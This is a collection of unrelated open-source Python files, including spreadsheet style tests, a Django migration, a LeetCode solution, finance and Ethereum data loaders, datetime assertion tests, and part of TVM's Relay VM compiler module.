xlsxwriter/test/styles/test_write_colors.py | DeltaEpsilon7787/XlsxWriter | 2,766 | 12739730 | <reponame>DeltaEpsilon7787/XlsxWriter<gh_stars>1000+
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, <NAME>, <EMAIL>
#
import unittest
from io import StringIO
from ...styles import Styles
class TestWriteColors(unittest.TestCase):
"""
Test the Styles _write_colors() method.
"""
def setUp(self):
self.fh = StringIO()
self.styles = Styles()
self.styles._set_filehandle(self.fh)
def test_write_colors1(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF26DA55']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FF26DA55"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_colors2(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF26DA55', 'FF792DC8', 'FF646462']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FF646462"/><color rgb="FF792DC8"/><color rgb="FF26DA55"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_colors3(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF792DC8', 'FF646462', 'FF5EA29C',
'FF583AC6', 'FFE31DAF', 'FFA1A759',
'FF600FF1', 'FF0CF49C', 'FFE3FA06',
'FF913AC6', 'FFB97847', 'FFD97827']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FFD97827"/><color rgb="FFB97847"/><color rgb="FF913AC6"/><color rgb="FFE3FA06"/><color rgb="FF0CF49C"/><color rgb="FF600FF1"/><color rgb="FFA1A759"/><color rgb="FFE31DAF"/><color rgb="FF583AC6"/><color rgb="FF5EA29C"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
knox/migrations/0002_auto_20150916_1425.py | GTpyro/django-rest-knox | 788 | 12739735 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('knox', '0001_initial'),
]
operations = [
migrations.DeleteModel('AuthToken'),
migrations.CreateModel(
name='AuthToken',
fields=[
('digest', models.CharField(max_length=64, serialize=False, primary_key=True)),
('salt', models.CharField(max_length=16, serialize=False, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='auth_token_set', on_delete=models.CASCADE)),
],)
]
|
Algo and DSA/LeetCode-Solutions-master/Python/longest-common-subpath.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12739749 | # Time: O(m * nlogn)
# Space: O(n)
class Solution(object):
def longestCommonSubpath(self, n, paths):
"""
:type n: int
:type paths: List[List[int]]
:rtype: int
"""
def RabinKarp(arr, x): # double hashing
hashes = tuple([reduce(lambda h,x: (h*p+x)%MOD, (arr[i] for i in xrange(x)), 0) for p in P])
powers = [pow(p, x, MOD) for p in P]
lookup = {hashes}
for i in xrange(x, len(arr)):
hashes = tuple([(hashes[j]*P[j] - arr[i-x]*powers[j] + arr[i])%MOD for j in xrange(len(P))]) # in smaller datasets, tuple from list is much faster than tuple from generator, see https://stackoverflow.com/questions/16940293/why-is-there-no-tuple-comprehension-in-python
lookup.add(hashes)
return lookup
def check(paths, x):
intersect = RabinKarp(paths[0], x)
for i in xrange(1, len(paths)):
intersect = set.intersection(intersect, RabinKarp(paths[i], x))
if not intersect:
return False
return True
MOD, P = 10**9+7, (113, 109) # MOD could be the min prime of 7-digit number (10**6+3), P could be (2, 3)
left, right = 1, min(len(p) for p in paths)
while left <= right:
mid = left + (right-left)//2
if not check(paths, mid):
right = mid-1
else:
left = mid+1
return right
# Time: O(m * nlogn)
# Space: O(n)
class Solution2(object):
def longestCommonSubpath(self, n, paths):
"""
:type n: int
:type paths: List[List[int]]
:rtype: int
"""
def RabinKarp(arr, x):
h = reduce(lambda h,x: (h*P+x)%MOD, (arr[i] for i in xrange(x)), 0)
power = pow(P, x, MOD)
lookup = {h}
for i in xrange(x, len(arr)):
h = (h*P - arr[i-x]*power + arr[i])%MOD
lookup.add(h)
return lookup
def check(paths, x):
intersect = RabinKarp(paths[0], x)
for i in xrange(1, len(paths)):
intersect = set.intersection(intersect, RabinKarp(paths[i], x))
if not intersect:
return False
return True
MOD, P = 10**11+19, max(x for p in paths for x in p)+1 # MOD is the min prime of 12-digit number
left, right = 1, min(len(p) for p in paths)
while left <= right:
mid = left + (right-left)//2
if not check(paths, mid):
right = mid-1
else:
left = mid+1
return right
|
zipline/pipeline/loaders/equity_pricing_loader.py | nathanwolfe/zipline-minute-bars | 412 | 12739759 | <reponame>nathanwolfe/zipline-minute-bars<filename>zipline/pipeline/loaders/equity_pricing_loader.py<gh_stars>100-1000
# Copyright 2015 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import (
iinfo,
uint32,
)
from zipline.data.us_equity_pricing import (
BcolzDailyBarReader,
SQLiteAdjustmentReader,
)
from zipline.lib.adjusted_array import AdjustedArray
from zipline.errors import NoFurtherDataError
from zipline.utils.calendars import get_calendar
from .base import PipelineLoader
UINT32_MAX = iinfo(uint32).max
class USEquityPricingLoader(PipelineLoader):
"""
PipelineLoader for US Equity Pricing data
Delegates loading of baselines and adjustments.
"""
def __init__(self, raw_price_loader, adjustments_loader):
self.raw_price_loader = raw_price_loader
self.adjustments_loader = adjustments_loader
cal = self.raw_price_loader.trading_calendar or \
get_calendar("NYSE")
self._all_sessions = cal.all_sessions
@classmethod
def from_files(cls, pricing_path, adjustments_path):
"""
Create a loader from a bcolz equity pricing dir and a SQLite
adjustments path.
Parameters
----------
pricing_path : str
Path to a bcolz directory written by a BcolzDailyBarWriter.
adjusments_path : str
Path to an adjusments db written by a SQLiteAdjustmentWriter.
"""
return cls(
BcolzDailyBarReader(pricing_path),
SQLiteAdjustmentReader(adjustments_path)
)
def load_adjusted_array(self, columns, dates, assets, mask):
# load_adjusted_array is called with dates on which the user's algo
# will be shown data, which means we need to return the data that would
# be known at the start of each date. We assume that the latest data
# known on day N is the data from day (N - 1), so we shift all query
# dates back by a day.
start_date, end_date = _shift_dates(
self._all_sessions, dates[0], dates[-1], shift=1,
)
colnames = [c.name for c in columns]
raw_arrays = self.raw_price_loader.load_raw_arrays(
colnames,
start_date,
end_date,
assets,
)
adjustments = self.adjustments_loader.load_adjustments(
colnames,
dates,
assets,
)
out = {}
for c, c_raw, c_adjs in zip(columns, raw_arrays, adjustments):
out[c] = AdjustedArray(
c_raw.astype(c.dtype),
mask,
c_adjs,
c.missing_value,
)
return out
def _shift_dates(dates, start_date, end_date, shift):
try:
start = dates.get_loc(start_date)
except KeyError:
if start_date < dates[0]:
raise NoFurtherDataError(
msg=(
"Pipeline Query requested data starting on {query_start}, "
"but first known date is {calendar_start}"
).format(
query_start=str(start_date),
calendar_start=str(dates[0]),
)
)
else:
raise ValueError("Query start %s not in calendar" % start_date)
# Make sure that shifting doesn't push us out of the calendar.
if start < shift:
raise NoFurtherDataError(
msg=(
"Pipeline Query requested data from {shift}"
" days before {query_start}, but first known date is only "
"{start} days earlier."
).format(shift=shift, query_start=start_date, start=start),
)
try:
end = dates.get_loc(end_date)
except KeyError:
if end_date > dates[-1]:
raise NoFurtherDataError(
msg=(
"Pipeline Query requesting data up to {query_end}, "
"but last known date is {calendar_end}"
).format(
query_end=end_date,
calendar_end=dates[-1],
)
)
else:
raise ValueError("Query end %s not in calendar" % end_date)
return dates[start - shift], dates[end - shift]
|
tests/test_datetime.py | ActivisionGameScience/assertpy | 246 | 12739777 | # Copyright (c) 2015-2019, Activision Publishing, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
from assertpy import assert_that,fail
d1 = datetime.datetime.today()
def test_is_before():
d2 = datetime.datetime.today()
assert_that(d1).is_before(d2)
def test_is_before_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_before(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be before <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_before_bad_val_type_failure():
try:
assert_that(123).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_before_bad_arg_type_failure():
try:
assert_that(d1).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_after():
d2 = datetime.datetime.today()
assert_that(d2).is_after(d1)
def test_is_after_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_after(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be after <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_after_bad_val_type_failure():
try:
assert_that(123).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_after_bad_arg_type_failure():
try:
assert_that(d1).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds():
assert_that(d1).is_equal_to_ignoring_milliseconds(d1)
def test_is_equal_to_ignoring_milliseconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_milliseconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_milliseconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds():
assert_that(d1).is_equal_to_ignoring_seconds(d1)
def test_is_equal_to_ignoring_seconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_seconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_seconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time():
assert_that(d1).is_equal_to_ignoring_time(d1)
def test_is_equal_to_ignoring_time_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_time(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2}> to be equal to <\d{4}-\d{2}-\d{2}>, but was not.')
def test_is_equal_to_ignoring_time_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_greater_than():
d2 = datetime.datetime.today()
assert_that(d2).is_greater_than(d1)
def test_is_greater_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_greater_than_or_equal_to():
assert_that(d1).is_greater_than_or_equal_to(d1)
def test_is_greater_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than_or_equal_to(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than():
d2 = datetime.datetime.today()
assert_that(d1).is_less_than(d2)
def test_is_less_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_bad_arg_type_failure():
try:
assert_that(d1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than_or_equal_to():
assert_that(d1).is_less_than_or_equal_to(d1)
def test_is_less_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than_or_equal_to(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_between():
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d2).is_between(d1, d3)
def test_is_between_failure():
try:
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_between_bad_arg1_type_failure():
try:
assert_that(d1).is_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_not_between():
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d1).is_not_between(d2, d3)
def test_is_not_between_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d2).is_not_between(d1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was.')
def test_is_not_between_bad_arg1_type_failure():
try:
assert_that(d1).is_not_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_not_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_close_to():
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=5))
def test_is_close_to_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=1))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was not.')
def test_is_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
def test_is_not_close_to():
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=4))
def test_is_not_close_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=5))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was.')
def test_is_not_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_not_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_not_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
t1 = datetime.timedelta(seconds=60)
def test_is_greater_than_timedelta():
d2 = datetime.timedelta(seconds=120)
assert_that(d2).is_greater_than(t1)
def test_is_greater_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_greater_than_or_equal_to_timedelta():
assert_that(t1).is_greater_than_or_equal_to(t1)
def test_is_greater_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than_or_equal_to(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_timedelta():
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_less_than(t2)
def test_is_less_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_or_equal_to_timedelta():
assert_that(t1).is_less_than_or_equal_to(t1)
def test_is_less_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than_or_equal_to(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_between(t1, d3)
def test_is_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=30)
d3 = datetime.timedelta(seconds=40)
assert_that(t1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_not_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(t1).is_not_between(d2, d3)
def test_is_not_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_not_between(t1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to not be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was.')
|
splinter/element_list.py | schurma/splinter | 2,049 | 12739783 | <filename>splinter/element_list.py
# -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from splinter.exceptions import ElementDoesNotExist
class ElementList(object):
"""
List of elements. Each member of the list is (usually) an instance
of :class:`ElementAPI <splinter.driver.ElementAPI>`.
Beyond the traditional list methods, the ``ElementList`` provides some
other methods, listed below.
There is a peculiar behavior on ElementList: you never get an
``IndexError``. Instead, you can an :class:`ElementDoesNotExist
<splinter.exceptions.ElementDoesNotExist>` exception when trying to
access an inexistent item in the list:
>>> element_list = ElementList([])
>>> element_list[0] # raises ElementDoesNotExist
"""
def __init__(self, list, driver=None, find_by=None, query=None):
self._container = []
self._container.extend(list)
self.driver = driver
self.find_by = find_by
self.query = query
def __getitem__(self, index):
if not isinstance(index, int) and not isinstance(index, slice):
return self.first[index]
try:
return self._container[index]
except IndexError:
raise ElementDoesNotExist(
u'no elements could be found with {0} "{1}"'.format(
self.find_by, self.query
)
)
@property
def first(self):
"""An alias to the first element of the list.
Example:
>>> assert element_list[0] == element_list.first
"""
return self[0]
@property
def last(self):
"""An alias to the last element of the list.
Example:
>>> assert element_list[-1] == element_list.last
"""
return self[-1]
def is_empty(self):
"""Check if the ElementList is empty.
Returns:
bool: True if the list is empty, else False
"""
return len(self) == 0
def __getattr__(self, name):
try:
return getattr(self.first, name)
except AttributeError:
try:
return getattr(self._container, name)
except AttributeError:
raise AttributeError(
u"'{0}' object has no attribute '{1}'".format(
self.__class__.__name__, name
)
)
def __iter__(self):
for item in self._container:
yield item
def __len__(self):
"""__len__ checks the internal container."""
return len(self._container)
|
tests/ethereumetl/job/helpers.py | zalam003/ethereum-etl | 1,482 | 12739800 | import os
from web3 import HTTPProvider
from ethereumetl.providers.rpc import BatchHTTPProvider
from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider
from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider
def get_web3_provider(provider_type, read_resource_lambda=None, batch=False):
if provider_type == 'mock':
if read_resource_lambda is None:
raise ValueError('read_resource_lambda must not be None for provider type mock'.format(provider_type))
if batch:
provider = MockBatchWeb3Provider(read_resource_lambda)
else:
provider = MockWeb3Provider(read_resource_lambda)
elif provider_type == 'infura':
provider_url = os.environ.get('PROVIDER_URL', 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')
if batch:
provider = BatchHTTPProvider(provider_url)
else:
provider = HTTPProvider(provider_url)
else:
raise ValueError('Provider type {} is unexpected'.format(provider_type))
return provider
|
aiogram/types/video.py | SvineruS/aiogram | 2,744 | 12739810 | <filename>aiogram/types/video.py
from . import base
from . import fields
from . import mixins
from .photo_size import PhotoSize
class Video(base.TelegramObject, mixins.Downloadable):
"""
This object represents a video file.
https://core.telegram.org/bots/api#video
"""
file_id: base.String = fields.Field()
file_unique_id: base.String = fields.Field()
width: base.Integer = fields.Field()
height: base.Integer = fields.Field()
duration: base.Integer = fields.Field()
thumb: PhotoSize = fields.Field(base=PhotoSize)
file_name: base.String = fields.Field()
mime_type: base.String = fields.Field()
file_size: base.Integer = fields.Field()
|
python/tvm/relay/backend/vm.py | shengxinhu/tvm | 4,640 | 12739836 | <filename>python/tvm/relay/backend/vm.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, unidiomatic-typecheck, undefined-variable, invalid-name, redefined-builtin
"""
The Relay Virtual Machine.
Implements a Python interface to compiling and executing on the Relay VM.
"""
import numpy as np
import tvm.runtime.ndarray as _nd
import tvm.runtime.vm as vm_rt
from tvm import autotvm
from tvm.relay import expr as _expr
from tvm.relay.backend.interpreter import Executor
from tvm.target import Target
from . import _vm
def compile(mod, target=None, target_host=None, params=None):
"""Compile the module to VM executable. A helper function for VMCompiler.
Parameters
----------
mod : tvm.IRModule
The Relay module to build.
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : None, or any target-like object, see Target.canon_target
Host compilation target, if target is device.
When TVM compiles device specific program such as CUDA,
we also need host(CPU) side code to interact with the driver
to setup the dimensions and parameters correctly.
target_host is used to specify the host side codegen target.
By default, llvm is used if it is enabled,
otherwise a stackvm intepreter is used.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
Returns
-------
exec : tvm.runtime.vm.Executable
The VM executable that contains both library code and bytecode.
"""
compiler = VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target, target_host)
compiler.codegen()
return compiler.get_exec()
class VMCompiler(object):
"""Compiler that compiles Relay module to VM executable."""
def __init__(self):
self.mod = _vm._VMCompiler()
self._lower = self.mod["lower"]
self._codegen = self.mod["codegen"]
self._get_exec = self.mod["get_executable"]
self._set_params_func = self.mod["set_params"]
self._get_params_func = self.mod["get_params"]
self._optimize = self.mod["optimize"]
def set_params(self, params):
"""Set constant parameters for the model.
Parameters
----------
